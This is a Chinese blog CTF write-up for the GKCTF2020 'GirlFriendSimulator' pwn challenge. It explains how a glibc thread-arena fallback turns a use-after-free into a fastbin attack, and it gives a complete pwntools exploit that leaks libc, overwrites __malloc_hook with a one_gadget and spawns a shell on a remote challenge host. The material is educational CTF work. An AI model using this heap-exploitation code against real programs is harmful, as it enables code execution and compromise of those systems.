ha1vk's blog
0%

线程PWN之gkctf2020 GirlFriendSimulator

发表于 分类于

首先,检查一下程序的保护机制

然后我们用IDA分析一下,一个多线程程序

在线程里的delete功能,存在UAF

但是由于add功能次数限制,无法在线程里完成这个UAF的利用

在glibc中,线程有自己的arena,但是arena的个数是有限的,一般跟处理器核心个数有关,假如线程个数超过arena总个数,并且执行线程都在使用,那么该怎么办呢。Glibc会遍历所有的arena,首先是从主线程的main_arena开始,尝试lock该arena,如果成功lock,那么就把这个arena给线程使用

为了测试有多少个arena,我们写如下脚本

1
2
3
4
5
6
7
8
9
for i in range(num - 1):
   add(0x10,'a'*0x10)
   delete()
   add(0x10,'a'*0x8)
   show()
   sh.recvuntil('a'*0x8)
   heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
   print 'heap_addr=',hex(heap_addr)
   nextThread()

我们看到,第9个,其堆地址跟main_arena管理的堆地址相似,可以推断出,该线程使用了main_arena。因此,我们在第9个线程里,利用delete功能制造UAF,然后,在main函数后面的流程中,

可以直接编辑最后一个线程创建的堆,也就是可以把fake_chunk链接到bin上,从而利用fastbin attack。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#coding:utf8
from pwn import *

#sh = process('./girlfriend_simulator')
sh = remote('node3.buuoj.cn',25877)
libc = ELF('./libc-2.23.so')
num = 9
sh.sendlineafter('How much girlfriend you want ?',str(num))

def add(size,content):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('size?',str(size))
   sh.sendafter('content:',content)

def delete():
   sh.sendlineafter('>>','2')

def show():
   sh.sendlineafter('>>','3')

def nextThread():
   sh.sendlineafter('>>','5')

for i in range(num - 1):
   add(0x10,'a'*0x10)
   delete()
   add(0x10,'a'*0x8)
   show()
   sh.recvuntil('a'*0x8)
   heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
   print 'heap_addr=',hex(heap_addr)
   nextThread()
#这个线程将使用主线程的main_arena,由此在主线程的堆里制造一个UAF
add(0x60,'a'*0x60)
delete()
nextThread()

sh.recvuntil('wife:0x')
libc_base = int(sh.recv(12),16) - libc.sym['_IO_2_1_stdout_']
malloc_hook_addr = libc_base + libc.sym['__malloc_hook']
one_gadget_addr = libc_base + 0x4526a
realloc_addr = libc_base + libc.sym['realloc']
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'realloc_addr=',hex(realloc_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)
sh.sendlineafter('say something to impress your girlfriend',p64(malloc_hook_addr - 0x23))
sh.sendlineafter('your girlfriend is moved by your words','I love you')
#改写malloc_hook
payload = '\x00'*0xB + p64(one_gadget_addr) + p64(realloc_addr + 0x2)
sh.sendlineafter('Questionnaire',payload)

sh.interactive()